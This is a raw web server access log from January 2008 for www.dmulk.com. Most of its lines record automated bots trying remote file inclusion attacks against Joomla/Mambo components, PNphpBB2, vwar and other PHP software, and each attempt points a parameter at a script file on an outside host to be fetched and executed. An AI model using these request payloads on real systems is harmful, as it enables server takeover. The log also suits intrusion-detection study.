195.242.208.120 - - [26/Jan/2008:05:31:49 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:05:32:47 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:05:32:47 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:05:32:52 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:33:35 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:33:36 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:33:36 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:34:06 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:34:07 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:34:07 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:05:34:08 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.66.129 - - [26/Jan/2008:05:34:10 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bsnet.web.id/data/scn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.66.129 - - [26/Jan/2008:05:34:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bsnet.web.id/data/scn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.66.129 - - [26/Jan/2008:05:34:10 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bsnet.web.id/data/scn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [26/Jan/2008:05:34:17 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [26/Jan/2008:05:34:17 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [26/Jan/2008:05:34:18 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.19 - - [26/Jan/2008:05:34:20 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.42.236.140 - - [26/Jan/2008:05:34:35 -0800] "GET /logs/access.log/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.42.236.140 - - [26/Jan/2008:05:34:35 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.42.236.140 - - [26/Jan/2008:05:34:38 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.250.33 - - [26/Jan/2008:05:34:57 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:35:12 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:35:12 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:35:13 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:05:35:14 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.70.19 - - [26/Jan/2008:05:35:19 -0800] "HEAD /bikes/dteel/MVI_2430.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [26/Jan/2008:05:35:19 -0800] "HEAD /bikes/dteel/MVI_2434.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [26/Jan/2008:05:35:19 -0800] "HEAD /funny/terryt1.wmv HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.56.173.139 - - [26/Jan/2008:05:35:42 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.173.139 - - [26/Jan/2008:05:35:42 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.173.139 - - [26/Jan/2008:05:35:42 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.173.139 - - [26/Jan/2008:05:35:44 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.143.90 - - [26/Jan/2008:05:35:50 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.90.48.3 - - [26/Jan/2008:05:35:56 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
202.90.48.3 - - [26/Jan/2008:05:35:56 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
202.90.48.3 - - [26/Jan/2008:05:35:56 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:36:05 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:36:05 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:36:05 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 32488 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:36:08 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [26/Jan/2008:05:36:55 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:05:37:07 -0800] "GET /logs/access_080106.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:05:37:08 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:05:37:33 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:05:37:39 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:05:37:44 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.120.63 - - [26/Jan/2008:05:38:16 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.120.63 - - [26/Jan/2008:05:38:16 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.120.63 - - [26/Jan/2008:05:38:17 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.120.63 - - [26/Jan/2008:05:38:20 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [26/Jan/2008:05:38:45 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:39:59 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:39:59 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [26/Jan/2008:05:39:59 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.172.213.14 - - [26/Jan/2008:05:41:33 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.175.53 - - [26/Jan/2008:05:41:57 -0800] "GET /errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.149.175.53 - - [26/Jan/2008:05:41:58 -0800] "GET /logs/errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:43:33 -0800] "GET /logs/access_071225.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:43:34 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:43:34 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.242.43 - - [26/Jan/2008:05:43:50 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.228.66.170 - - [26/Jan/2008:05:44:15 -0800] "GET /logs/access_071225.log//?mosConfig_absolute_path=http://www.aneuk.com/test/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:44:37 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.201.198.226 - - [26/Jan/2008:05:45:45 -0800] "GET /logs/access_071216.log/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:05:45:49 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:45:55 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:16 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:16 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:16 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:17 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:17 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:17 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:23 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:23 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.89 - - [26/Jan/2008:05:46:23 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:05:46:26 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:36 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:37 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:38 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:38 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:38 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:39 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.244.179.166 - - [26/Jan/2008:05:47:39 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/code/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:05:47:47 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:05:47:48 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:05:47:48 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:05:48:02 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:05:49:01 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
74.6.28.165 - - [26/Jan/2008:05:50:07 -0800] "GET /tmp/sess_97c6137c001a62b548ebabf40f4feaca HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.86 - - [26/Jan/2008:05:50:10 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:05:50:12 -0800] "GET /logs/access_080112.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.22.3.3 - - [26/Jan/2008:05:50:16 -0800] "GET /logs/access_071212.log/protection.php?action=logout&siteurl=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.3.3 - - [26/Jan/2008:05:50:17 -0800] "GET /protection.php?action=logout&siteurl=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.3.3 - - [26/Jan/2008:05:50:17 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.94 - - [26/Jan/2008:05:50:53 -0800] "GET /logs/access.log HTTP/1.0" 200 98041 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.111.176.108 - - [26/Jan/2008:05:52:20 -0800] "GET /config.php?path_to_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.53.83.254 - - [26/Jan/2008:05:53:10 -0800] "GET /logs/access_071225.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.53.83.254 - - [26/Jan/2008:05:53:10 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
84.53.83.254 - - [26/Jan/2008:05:53:11 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 32488 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:54:03 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:54:03 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
